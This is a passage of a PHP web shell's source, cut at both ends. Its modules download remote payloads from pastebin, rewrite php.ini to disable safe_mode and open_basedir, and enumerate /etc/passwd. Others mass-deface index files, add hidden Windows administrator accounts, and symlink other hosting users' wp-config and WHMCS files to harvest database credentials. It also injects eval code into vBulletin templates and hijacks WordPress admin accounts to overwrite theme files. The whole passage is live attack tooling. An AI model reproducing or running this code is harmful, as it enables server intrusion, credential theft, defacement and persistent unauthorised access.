  798. Or <a href="?echo "path=".$path;&amp;x=bypsini"><input class=bordergaya type=submit value="Bypass Disable Functions" /></a>
  799. Or <a href="?echo "path=".$path;&amp;x=bysysfuncwexec"><input class=bordergaya type=submit value="Bypass Root Path With Exec Function" /></a>
  800. <br/><br/><br/><br/>
  801.  
  802.             }
  803.     ////////////////////////////////////////
  804.             ///////////////////////////////////////
  805.             elseif(isset($_GET['x']) && ($_GET['x'] == 'bysysfuncwsf')) {
  806.             echo '<br><center><span style="font-size:20px;">Bypass Root Path With System Function</span><center>';
  807.             mkdir('bysyswsf', 0755);
  808.             chdir('bysyswsf');
  809.             $bysyswsf = file_get_contents("https://pastebin.com/raw/Pw07PwVD");
  810.             $file = fopen("bysyswsf.php" ,"w+");
  811.             $write = fwrite ($file ,$bysyswsf);
  812.             fclose($file);
  813.             chmod("bysyswsf.php",0755);
  814.             echo "<iframe src=bysyswsf/bysyswsf.php width=70% height=70% frameborder=0></iframe>";
  815.             }
  816.             ////////////////////////////////////////
  817.             ////////////////////////////////////////
  818.             elseif(isset($_GET['x']) && ($_GET['x'] == 'bypsini')) {
  819.                     $byht = "safe_mode = Off
  820.                    disable_functions = None
  821.                    safe_mode_gid = OFF
  822.                    open_basedir = OFF
  823.                    allow_url_fopen = On";
  824.                     file_put_contents("php.ini",$byht);
  825.                     echo "<script>alert('Congrats!'); hideAll();</script>";
  826.                     die('<meta http-equiv="refresh" content="0; url=?" />');
  827.             }
  828.             ////////////////////////////////////////
  829.             ///////////////////////////////////////
  830.             elseif(isset($_GET['x']) && ($_GET['x'] == 'bysysfuncwexec')) {
  831.             echo '<br><center><span style="font-size:20px;">Bypass Root Path With Exec Function</span><center>';
  832.             mkdir('bysyswexecf', 0755);
  833.             chdir('bysyswexecf');
  834.             $bysyswsf = file_get_contents("https://pastebin.com/raw/6ccPfLW6");
  835.             $file = fopen("bysyswexecf.php" ,"w+");
  836.             $write = fwrite ($file ,$bysyswsf);
  837.             fclose($file);
  838.             chmod("bysyswexecf.php",0755);
  839.             echo "<iframe src=bysyswexecf/bysyswexecf.php width=70% height=70% frameborder=0></iframe>";
  840.            
  841.             }
  842.             ////////////////////////////////////////
  843.             ////////////////////////////////////////
  844.  
  845.     ///////////////////////////////////////////////////////////////////////////
  846.         ///////////JUMPING////////////////////////////////////////////////////////
  847.         //////////////////////////////////////////
  848.         elseif (isset($_GET['x']) && ($_GET['x'] == 'jumping')) {
  849. <center>
  850. <form action="?sad=echo $pwd;&amp;x=jumping" method="post">
  851. //radable public_html
  852.                 ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
  853.                 set_time_limit(0);
  854.                 ###################
  855.                @$passwd = fopen('/etc/passwd','r');
  856.                 if (!$passwd) { die('<br>[-] Error : coudn`t read /etc/passwd'); }
  857.                 $pub = array();
  858.                 $users = array();
  859.                 $conf = array();
  860.                 $i = 0;
  861.                 while(!feof($passwd))
  862.                 {
  863.                 $str = fgets($passwd);
  864.                 if ($i > 35)
  865.                 {
  866.                 $pos = strpos($str,':');
  867.                 $username = substr($str,0,$pos);
  868.                 $dirz = '/home/'.$username.'/public_html/';
  869.                 if (($username != ''))
  870.                 {
  871.                 if (is_readable($dirz))
  872.                 {
  873.                 array_push($users,$username);
  874.                 array_push($pub,$dirz);
  875.                 }
  876.                 }
  877.                 }
  878.                 $i++;
  879.                 }
  880.                 ###################
  881.                echo '<br><br></center></center>';
  882.                 echo "<font class='rapihbanget'>[+] Founded ".sizeof($users)." entrys in /etc/passwd\n<br /></font>";
  883.                 echo "<font class='rapihbanget'>[+] Founded ".sizeof($pub)." readable public_html directories\n<br /></font>";
  884.                 echo "<font class='rapihbanget'>[~] Searching for passwords in config files...<br /><br /></font>";
  885.                 foreach ($users as $user)
  886.                 {
  887.                 $path = "/home/$user/public_html/";
  888.                 echo "<font class='rapihbanget'><a href='?sad&#61;$path' target='_blank' font-weight:bold; color:#F80;'>$path</a><br></font>";
  889.                 }
  890.                 echo "<br /><font class='rapihbanget'>[+] Complete...\n<br /></font>";
  891.                 echo "<font class='rapihbanget'>[+] Monggo Sikat Boz!\n<br /></font>";
  892.                 echo '<br><br></b></body><center>';
  893.                
  894.         }
  895.  
  896.  
  897. ///////////////
  898.  
  899.  elseif (isset($_GET['x']) && ($_GET['x'] == 'mass')) {
  900.     error_reporting(0);<center><table><td width="50%"><form ENCTYPE="multipart/form-data" action="$_SERVER['PHP_SELF'];" method=post><p align="center"><h2>Folder</h2><input class='inputz' typ=text name=path size=60 value="echo getcwd();"><br><h2>file name</h2><input class='inputz' typ=text name=file size=60 value="index.php"><br></td><td width="50%"><h3>Script Defacemu </h3><textarea class='inputz' name=index rows=10 cols=40>Hacked By NoNameUser - Error Violence</textarea><br></td></p></table><center><br><br><br><input class='inputzbut' type=submit value="&nbsp;&nbsp;Deface&nbsp;&nbsp;"></center></form><br>$mainpath = $_POST[path];
  901.     $file     = $_POST[file];
  902.     $dir      = opendir("$mainpath");
  903.     $code     = base64_encode($_POST[index]);
  904.     $indx     = base64_decode($code);
  905.     while ($row = readdir($dir)) {
  906.         $start  = @fopen("$row/$file", "w+");
  907.         $finish = @fwrite($start, $indx);
  908.         if ($finish) {
  909.             echo "$row/$file > Done<br><br>";
  910.         }
  911.     }
  912.    
  913. }
  914.     ///menu rdp
  915.         if(isset($_GET['x']) && ($_GET['x'] == 'krdp'))
  916.            
  917.         {
  918.                 if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
  919.                 {<br/><br/>
  920. <center>
  921. <h1>RDP Creator By Shor7cut</h1>
  922. <div id="content-left">
  923. <form action="" method="post">
  924. <table border="1px" bordercolor="#2d2b2b" cellpadding="5px">
  925. <tr>
  926. <td colspan="3" align="center" bgcolor="#2d2b2b"><font face="Fredericka the Great" size="2px" color="white">CREATE RDP</font></td>
  927. </tr>
  928. <tr>
  929. <td><font class='kecew'>Username</font></td>
  930. <td><font class='kecew'> : </font></td>
  931. <td><input type="text" class="bordergaya" name="username" required></td>
  932. </tr>
  933. <tr>
  934. <td><font class='kecew'>Password</font></td>
  935. <td><font class='kecew'> : </font></td>
  936. <td><input type="text" class="bordergaya" name="password" required></td>
  937. </tr>
  938. <tr>
  939. <td colspan="3" align="center"><input type="hidden" name="kshell" value="1"><input type="submit" name="submit" class="bordergaya" value="Create"></td>
  940. </tr>
  941. </table>
  942. </form>
  943. </div>
  944. <br/>
  945. <div id="content-left">
  946. <form action="" method="post">
  947. <table border="1px" bordercolor="#2d2b2b" cellpadding="5px">
  948. <tr>
  949. <td colspan="3" align="center" bgcolor="#2d2b2b"><font face="Fredericka the Great" size="2px" color="white">OPTION</td>
  950. </tr>
  951. <tr>
  952. <td><font class='kecew'>Username</font></td>
  953. <td><font class='kecew'> : </font></td>
  954. <td><input type="text" name="rusername" placeholder="Masukan Username" class="bordergaya"></td>
  955. </tr>
  956. <tr>
  957. <td><font class='kecew'>Password</font></td>
  958. <td><font class='kecew'> : </font></td>
  959. <td><input type="text" name="gantipw" placeholder="Password Baru" class="bordergaya"></td>
  960. </tr>
  961. <tr>
  962. <td><font class='kecew'>Action</font></td>
  963. <td><font class='kecew'> : </font></td>
  964. <td>
  965. <select name="aksi" class="bordergaya">
  966. <option value="1">Tampilkan Username</option>
  967. <option value="2">Hapus Username</option>
  968. <option value="3">Ubah Password</option>
  969. </select>
  970. </td>
  971. </tr>
  972. <tr>
  973. <td colspan="3" align="center"><input type="hidden" name="kshell" value="2"><input type="submit" name="submit" class="bordergaya" value="Execute"></td>
  974. </tr>
  975. </table>
  976. </form>
  977. <br/>
  978. </div>
  979. </center></center>
  980. if($_POST['submit'])
  981.                     {
  982.                         if($_POST['kshell']=="1")
  983.                         {
  984.                             $r_user = $_POST['username'];
  985.                             $r_pass = $_POST['password'];
  986.                             $cmd_cek_user   = shell_exec("net user");
  987.                             if(preg_match("/$r_user/", $cmd_cek_user)){
  988.                                 echo $gaya_root.$r_user." sudah ada".$o;
  989.                             }else {
  990.                             $cmd_add_user   = shell_exec("net user ".$r_user." ".$r_pass." /add");
  991.                             $cmd_add_groups1 = shell_exec("net localgroup Administrators ".$r_user." /add");
  992.                             $cmd_add_groups2 = shell_exec("net localgroup Administrator ".$r_user." /add");
  993.                             $cmd_add_groups3 = shell_exec("net localgroup Administrateur ".$r_user." /add");
  994.                                 if($cmd_add_user){
  995.                                     echo $gaya_root."<font class='rapihbanget'>[+] Menambahkan User : ".$r_user." Password : ".$r_pass." <font color='greenyellow'>Berhasil!</font></font><br/><br/>".$o;
  996.                                 }else {
  997.                                     echo $gaya_root."<font class='rapihbanget'>[+] Menambahkan User : ".$r_user." Password : ".$r_pass." <font color='red'>Gagal!</font><br/><br/>".$o;
  998.                                 }
  999.                                 echo "<font class='rapihbanget'>[+] Sedang Memroses User.. Silahkan Tunggu Sebentar..  <br/>";
  1000.                                 if($cmd_add_groups1){
  1001.                                       echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o;
  1002.                                 }else
  1003.                                 if($cmd_add_groups2){
  1004.                                       echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o;
  1005.                                 }else
  1006.                                 if($cmd_add_groups3){
  1007.                                       echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o;
  1008.                                 }else {
  1009.                                       echo $gaya_root."<font class='rapihbanget'>--- Maaf User ".$r_user." <font color='red'>Gagal Di Proses!</font><br/><br/>".$o;
  1010.                                 }
  1011.                                 echo "<font class='rapihbanget'>[+] Server Info : </font><br/>";
  1012.                                 echo $gaya_root."<font class='rapihbanget'>--- ServerIP : ".$_SERVER["HTTP_HOST"]."</font><br/><font class='rapihbanget'>--- Username  : ".$r_user."</font><br/><font class='rapihbanget'>--- Password  : </font>".$r_pass.$o."</font><br/><br/>";
  1013.                                 echo "<font class='rapihbanget'>[+] Thank For Using It ~_^ </font><br/><br/>";
  1014.                             }
  1015.  
  1016.  
  1017.                         }
  1018.                         else if($_POST['kshell']=="2")
  1019.                         {
  1020.                             echo "<style>
  1021.                                    .coeg{margin-left:30%;}
  1022.                                    </style>";
  1023.                             if($_POST['aksi']=="1"){
  1024.                              echo "<pre class='coeg'>".shell_exec("net user");
  1025.                             }
  1026.                             else if($_POST['aksi']=="2")
  1027.                             {
  1028.                                 $username = $_POST['rusername'];
  1029.                                 $cmd_cek_user   = shell_exec("net user");
  1030.                                     if (!empty($username)){
  1031.                                         if(preg_match("/$username/", $cmd_cek_user)){
  1032.                                         $cmd_add_user   = shell_exec("net user ".$username." /DELETE");
  1033.                                         if($cmd_add_user){
  1034.                                             echo "<font class='rapihbanget'>[+] Sedang Memroses.. Silahkan Tunggu..  </font><br /><br />";
  1035.                                             echo $gaya_root."<font class='rapihbanget'>[+] Selamat! Remove User  </font><font color='orange'>".$username." </font><font color='greenyellow'>Berhasil!!</font><br /><br />".$o;
  1036.                                         }else {
  1037.                                             echo $gaya_root."<font class='rapihbanget'>[+] Yah :( Remove User  </font><font color='orange'>".$username." </font><font color='red'>Gagal!!</font><br /><br />".$o;
  1038.                                         }
  1039.                                     }else {
  1040.                                         echo $gaya_root."<font class='rapihbanget'>Are You Kidding Me?! Username : </font><font color='orange'>" .$username. " </font><font color='red'> Itu Enggak Ada!!</font><br /><br />".$o;
  1041.                                     }
  1042.                                     }else {
  1043.                                         echo $gaya_root."<font class='rapihbanget'> Silahkan Masukkan Dahulu Username Yang Mau Di Hapus!! </font><br /><br />".$o;
  1044.                                     }
  1045.                             }
  1046.                             else if($_POST['aksi']=="3")
  1047.                             {
  1048.                                 echo "<style>
  1049.                                        .tengahaja{margin-left:35%}
  1050.                                      </style>";
  1051.                                 $username = $_POST['rusername'];
  1052.                                 $password = $_POST['gantipw'];
  1053.                                 $cmd_cek_user   = shell_exec("net user");
  1054.                                     if (!empty($username)){
  1055.                                         if(preg_match("/$username/", $cmd_cek_user)){
  1056.                                             $cmd_add_user   = shell_exec("net user ".$username."");
  1057.                                             if($cmd_add_user){
  1058.                                             echo $gaya_root."<font class='tengahaja'>Ganti Password Username : ".$username." dan Password : ".$password." <font color='greenyellow'>Berhasil!!</font><br /><br />".$o;
  1059.                                         }else {
  1060.                                             echo $gaya_root."<font class='tengahaja'>Ganti Password Username : ".$username." dan Password : ".$password." <font color='red'>Gagal!!</font><br /><br />".$o;
  1061.                                         }
  1062.                                     }else
  1063.                                 {
  1064.                                     echo $gaya_root."<font class='rapihbanget'>Are You Kidding Me?! Username : </font><font color='orange'>" .$username. " </font><font color='red'> Itu Enggak Ada!!</font><br /><br />".$o;
  1065.                                 }
  1066.                                 }else
  1067.                                 {
  1068.                                     echo $gaya_root."<font class='rapihbanget'> Silahkan Masukkan Dahulu Username Yang Mau Di Hapus!! </font><br /><br />".$o;
  1069.                                 }
  1070.                             }
  1071.                         }
  1072.  
  1073.                     }
  1074.                 } else{
  1075.                     echo "<br><br><font color='springgreen' face='Fredericka The Great'>TOOLS GAK BISA DI PAKE NDAN -_- SERVERNYA BUKAN WINDOWS</font>";
  1076.                 }die();
  1077.         }
  1078. elseif (isset($_GET['x']) && ($_GET['x'] == 'hostg')) {
  1079.     echo $bencong . "<center><p class='font-effect-shadow-multiple' style=font-family:Ubuntu;font-size:25px;color:#58FAF4;><b>Symlink HostGator Server ('.ini') Extension Method</b></p>";<center><img src="http://www.taylorclark.co/wp-content/uploads/2013/06/Hostgator-VS-Amazon.jpg"></center><center><form method=post><font color=#58FAF4 size=2 face="Courier New">Get users (etc/passwd) for symlink ^_^</font><p><input type=submit name="hostg" value="Extract usernames" /></form></center> if (isset($_POST['hostg'])) {<form method=post><textarea rows=10 cols=50 name=user>$users = file("/etc/passwd");
  1080.        foreach ($users as $user) {
  1081.             $str = explode(":", $user);
  1082.             echo $str[0] . "\n";
  1083.         }</textarea><br><br><input type=submit name=su value="Bypass HostGator Configs" /></form> }error_reporting(0);
  1084.     echo "<font color=#58FAF4 size=2 face=\"Courier New\">";
  1085.     if (isset($_POST['su'])) {
  1086.         mkdir('HostGator', 0755);
  1087.         $rr = " Options +FollowSymLinks \n DirectoryIndex Sux.html \n Options +Indexes \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain.html ";
  1088.         $g  = fopen('HostGator/.htaccess', 'w');
  1089.         fwrite($g, $rr);
  1090.         $HostGator = symlink("/", "HostGator/root");
  1091.         $rt        = "<a href=HostGator/root><font color=#ff0000 size=2 face=\"Courier New\"> Bypassed Successfully</font></a>";
  1092.         echo "Check link given below for / folder symlink <br><b>$rt</b>";
  1093.         mkdir('HostGator', 0755);
  1094.         $rr = " Safe_mode = OFF \n Disable_functions = NONE \n Open_basedir = OFF ";
  1095.         $g  = fopen('HostGator/php.ini', 'w');
  1096.         fwrite($g, $rr);
  1097.         $HostGator = symlink("/", "HostGator/root");
  1098.         fwrite($f, $r);
  1099.         $consym = "<a href=HostGator/><font color=#ff0000 size=2 face=\"Courier New\">configuration files</font></a>";
  1100.         echo "<br><font color=#58FAF4 size=2 face=\"Courier New\">The link given below is for configs path symlink, If Forbidden you can view Configs inside the Source Code By Creating an shtml File and including virtual name of the config name Or Just Back Connect to the server and retrieve root manually ln -s / Good Chance ^_^  </font><br><b><font color=#58FAF4 size=2 face=\"Courier New\">$consym</font></b>";
  1101.         $usr           = explode("\n", $_POST['user']);
  1102.         $configuration = array(
  1103.             "wp-config.ini",
  1104.             "wordpress/wp-config.ini",
  1105.             "configuration.ini",
  1106.             "blog/wp-config.ini",
  1107.             "joomla/configuration.ini",
  1108.             "vb/includes/config.ini",
  1109.             "includes/config.ini",
  1110.             "conf_global.ini",
  1111.             "inc/config.ini",
  1112.             "config.ini",
  1113.             "Settings.ini",
  1114.             "sites/default/settings.ini",
  1115.             "whm/configuration.ini",
  1116.             "whmcs/configuration.ini",
  1117.             "support/configuration.ini",
  1118.             "whmc/WHM/configuration.ini",
  1119.             "whm/WHMCS/configuration.ini",
  1120.             "whm/whmcs/configuration.ini",
  1121.             "support/configuration.ini",
  1122.             "clients/configuration.ini",
  1123.             "client/configuration.ini",
  1124.             "clientes/configuration.ini",
  1125.             "cliente/configuration.ini",
  1126.             "clientsupport/configuration.ini",
  1127.             "billing/configuration.ini",
  1128.             "admin/config.ini"
  1129.         );
  1130.         foreach ($usr as $uss) {
  1131.             $us = trim($uss);
  1132.             foreach ($configuration as $c) {
  1133.                 $rs = "/home/" . $us . "/public_html/" . $c;
  1134.                 $r  = "HostGator/" . $us . " .. " . $c;
  1135.                 symlink($rs, $r);
  1136.             }
  1137.         }
  1138.     }
  1139. }
  1140. elseif (isset($_GET['x']) && ($_GET['x'] == 'grabc')) { @ini_set('output_buffering',0);
  1141.     echo "
  1142. <form method='POST'>
  1143. </head>
  1144. <style>
  1145. textarea{resize:none;color:#000;background-color:#000;font-size:8pt;color:#fff;border:1px solid white;border-left:4px solid white;width:543px;height:400px}input{color:#000;border:1px dotted white}
  1146. </style>";
  1147. echo "<center>";</center><br><center>if (empty($_POST['config'])) {<p><font face="Cabin" color="springgreen" size="2pt">/etc/passwd content</p><br><form method="POST"><textarea name="passwd" class='inputz' rows='15' cols='60'>echo file_get_contents('/etc/passwd');</textarea><br><br><input name="config" class='inputz' size="100" value="Grab!" type="submit"><br></form></center><br>}if ($_POST['config']) {$function = $functions=@ini_get("disable_functions");if(eregi("symlink",$functions)){die ('<error>Symlink disabled :( </error>');}@mkdir('Sad-Conf', 0755);@chdir('Sad-Conf');
  1148. $htaccess="
  1149. OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
  1150. Options Indexes FollowSymLinks
  1151. ForceType text/plain
  1152. AddType text/plain .php
  1153. AddType text/plain .html
  1154. AddType text/html .shtml
  1155. AddType txt .php
  1156. AddHandler server-parsed .php
  1157. AddHandler txt .php
  1158. AddHandler txt .html
  1159. AddHandler txt .shtml
  1160. Options All
  1161. Options All";
  1162. file_put_contents(".htaccess",$htaccess,FILE_APPEND);$passwd=$_POST["passwd"];
  1163. $passwd=explode("\n",$passwd);
  1164. echo "<br><br><center><font face='cabin' color=Crimson size=2pt>Kalem Ndan Lagi Di Proses...</center><br>";
  1165. foreach($passwd as $pwd){
  1166. $pawd=explode(":",$pwd);$user =$pawd[0];
  1167. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-wp13.txt');
  1168. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-wp13-wp.txt');
  1169. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-wp13-WP.txt');
  1170. @symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'-wp13-wp-beta.txt');
  1171. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp13-beta.txt');
  1172. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-wp13-press.txt');
  1173. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-wp13-wordpress.txt');
  1174. @symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$user.'-wp13-Wordpress.txt');
  1175. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp13-Wordpress.txt');
  1176. @symlink('/home/'.$user.'/public_html/config.php',$user.'-configgg.txt');
  1177. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-wp13-news.txt');
  1178. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-wp13-new.txt');
  1179. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp-blog.txt');
  1180. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp-beta.txt');
  1181. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-wp-blogs.txt');
  1182. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-wp-home.txt');
  1183. @symlink('/home/'.$user.'/public_html/db.php',$user.'-dbconf.txt');
  1184. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-wp-site.txt');
  1185. @symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'-wp-main.txt');
  1186. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-wp-test.txt');
  1187. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-joomla2.txt');
  1188. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-joomla-protal.txt');
  1189. @symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'-joo.txt');
  1190. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-joomla-cms.txt');
  1191. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-joomla-site.txt');
  1192. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-joomla-main.txt');
  1193. @symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'-joomla-news.txt');
  1194. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-joomla-new.txt');
  1195. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-joomla-home.txt');
  1196. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vb-config.txt');
  1197. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm15.txt');
  1198. @symlink('/home/'.$user.'/public_html/central/configuration.php',$user.'-whm-central.txt');
  1199. @symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$user.'-whm-whmcs.txt');
  1200. @symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$user.'-whm-WHMCS.txt');
  1201. @symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$user.'-whmc-WHM.txt');
  1202. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-whmcs.txt');
  1203. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-support.txt');
  1204. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-joomla.txt');
  1205. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-whmcs2.txt');
  1206. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm.txt');}
  1207. echo '<b><font face="Homenaje" color="springgreen" size="3pt"><b>Selesai Bro Monggo >></b> <a target="_blank" href="Sad-Conf">Hajar Config</a></font></b>';}
  1208. die();
  1209. }
  1210. /////// Cukup Sampai Disini ya Grabber :( ////////
  1211.  
  1212. elseif (isset($_GET['x']) && ($_GET['x'] == 'vb')) {
  1213.     if (empty($_POST['index'])) {
  1214.         echo "<center><br><br><FORM method='POST'>host : <INPUT size='15' class='inputz' value='localhost' name='localhost' type='text'>&nbsp;|&nbsp;database : <INPUT class='inputz' size='15' value='db_name' name='database' type='text'>&nbsp;|&nbsp;username : <INPUT class='inputz' size='15' value='db_user' name='username' type='text'>&nbsp;|&nbsp;password : <INPUT class='inputz' size='15' value='bd_pass' name='password' type='text'>&nbsp;|&nbsp;perfix : <input class='inputz' size='15' value='' name='perfix' type='text'><br><textarea class='inputz' name='index' cols='40' rows='10'>Hacked By CyberTeamRox</textarea><br><INPUT class='inputzbut' value='Deface' name='send' type='submit'></FORM></center>";
  1215.     } else {
  1216.         $localhost = $_POST['localhost'];
  1217.         $database  = $_POST['database'];
  1218.         $username  = $_POST['username'];
  1219.         $password  = $_POST['password'];
  1220.         $perfix    = $_POST['perfix'];
  1221.         $index     = $_POST['index'];
  1222.         @mysql_connect($localhost, $username, $password) or die(mysql_error());
  1223.         @mysql_select_db($database) or die(mysql_error());
  1224.         $index     = str_replace("\'", "'", $index);
  1225.         $set_index = "{\${eval(base64_decode(\'";
  1226.         $set_index .= base64_encode("echo '$index';");
  1227.         $set_index .= "\'))}}{\${exit()}}</textarea>";
  1228.         $ok = @mysql_query("UPDATE " . $perfix . "template SET template ='" . $set_index . "' WHERE title ='FORUMHOME'") or die(mysql_error());
  1229.         if ($ok) {
  1230.             echo "Defaced<br><br>";
  1231.         }
  1232.     }
  1233. }
  1234.  
  1235.  elseif (isset($_GET['x']) && ($_GET['x'] == 'wm')) {
  1236.     ini_set("display_errors", "0");
  1237.     set_time_limit(0);
  1238.     @session_start();
  1239.     $base_path = dirname(__FILE__) . '/';
  1240.     function entre2v2($text, $marqueurDebutLien, $marqueurFinLien, $i = 1)
  1241.     {
  1242.         $ar0 = explode($marqueurDebutLien, $text);
  1243.         $ar1 = explode($marqueurFinLien, $ar0[$i]);
  1244.         return trim($ar1[0]);
  1245.     }
  1246.     function randomt()
  1247.     {
  1248.         $chars = "abcdefghijkmnopqrstuvwxyz023456789";
  1249.         srand((double) microtime() * 1000000);
  1250.         $i    = 0;
  1251.         $pass = '';
  1252.         while ($i <= 7) {
  1253.             $num  = rand() % 33;
  1254.             $tmp  = substr($chars, $num, 1);
  1255.             $pass = $pass . $tmp;
  1256.             $i++;
  1257.         }
  1258.         return $pass;
  1259.     }
  1260.     function index_changer_wp($conf, $content)
  1261.     {
  1262.         $output   = '';
  1263.         $dol      = '$';
  1264.         $username = entre2v2($conf, "define('DB_USER', '", "');");
  1265.         $password = entre2v2($conf, "define('DB_PASSWORD', '", "');");
  1266.         $dbname   = entre2v2($conf, "define('DB_NAME', '", "');");
  1267.         $prefix   = entre2v2($conf, $dol . "table_prefix  = '", "'");
  1268.         $host     = entre2v2($conf, "define('DB_HOST', '", "');");
  1269.         $link     = mysql_connect($host, $username, $password);
  1270.         if ($link) {
  1271.             mysql_select_db($dbname, $link);
  1272.             $dol  = '$';
  1273.             $req1 = mysql_query("UPDATE `" . $prefix . "users` SET `user_login` = 'k2',`user_pass` = '4297f44b13955235245b2497399d7a93' WHERE `ID` = 1");
  1274.         } else {
  1275.             $output .= "[-] DB Error<br>";
  1276.         }
  1277.         if ($req1) {
  1278.             $req           = mysql_query("SELECT * from  `" . $prefix . "options` WHERE option_name='home'");
  1279.             $data          = mysql_fetch_array($req);
  1280.             $site_url      = $data["option_value"];
  1281.             $req           = mysql_query("SELECT * from  `" . $prefix . "options` WHERE option_name='template'");
  1282.             $data          = mysql_fetch_array($req);
  1283.             $template      = $data["option_value"];
  1284.             $req           = mysql_query("SELECT * from  `" . $prefix . "options` WHERE option_name='current_theme'");
  1285.             $data          = mysql_fetch_array($req);
  1286.             $current_theme = $data["option_value"];
  1287.             $useragent     = "Mozilla/4.0 (compatible;MSIE 7.0b;Windows NT 5.1;.NET CLR 1.1.4322;Alexa Toolbar;.NET CLR 2.0.50727)";
  1288.             $url2          = $site_url . "/wp-login.php";
  1289.             $ch            = curl_init();
  1290.             curl_setopt($ch, CURLOPT_URL, $url2);
  1291.             curl_setopt($ch, CURLOPT_POST, 1);
  1292.             curl_setopt($ch, CURLOPT_POSTFIELDS, "log=k2&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");
  1293.             curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1294.             curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1295.             curl_setopt($ch, CURLOPT_HEADER, 0);
  1296.             curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
  1297.             curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  1298.             curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  1299.             curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  1300.             $buffer = curl_exec($ch);
  1301.             $pos    = strpos($buffer, "action=logout");
  1302.             if ($pos === false) {
  1303.                 $output .= "[-] Successful Login<br>";
  1304.             } else {
  1305.                 $output .= "[+] Successful Login<br>";
  1306.             }
  1307.             $url2 = $site_url . "/wp-admin/theme-editor.php?file=/themes/" . $template . '/index.php&theme=' . urlencode($current_theme) . '&dir=theme';
  1308.             curl_setopt($ch, CURLOPT_URL, $url2);
  1309.             curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
  1310.             curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1311.             curl_setopt($ch, CURLOPT_HEADER, 0);
  1312.             curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  1313.             curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  1314.             curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  1315.             $buffer0  = curl_exec($ch);
  1316.             $_wpnonce = entre2v2($buffer0, '<input type="hidden" id="_wpnonce" name="_wpnonce" value="', '" />');
  1317.             $_file    = entre2v2($buffer0, '<input type="hidden" name="file" value="', '" />');
  1318.             if (substr_count($_file, "/index.php") != 0) {
  1319.                 $output .= "[+] index.php Opened<br>";
  1320.             } else {
  1321.                 $output .= "[-] index.php Unable to open<br>";
  1322.             }
  1323.             $url2 = $site_url . "/wp-admin/theme-editor.php";
  1324.             curl_setopt($ch, CURLOPT_URL, $url2);
  1325.             curl_setopt($ch, CURLOPT_POST, 1);
  1326.             curl_setopt($ch, CURLOPT_POSTFIELDS, "newcontent=" . $content . "&action=update&file=" . $_file . "&_wpnonce=" . $_wpnonce . "&submit=Update File");
  1327.             curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1328.             curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1329.             curl_setopt($ch, CURLOPT_HEADER, 0);
  1330.             curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  1331.             curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  1332.             curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  1333.             $buffer = curl_exec($ch);
  1334.             curl_close($ch);
  1335.             $pos  = strpos($buffer, '<div id="message" class="updated">');
  1336.             $cond = 0;
  1337.             if ($pos === false) {
  1338.                 $output .= "[-] index.php Failed<br>";
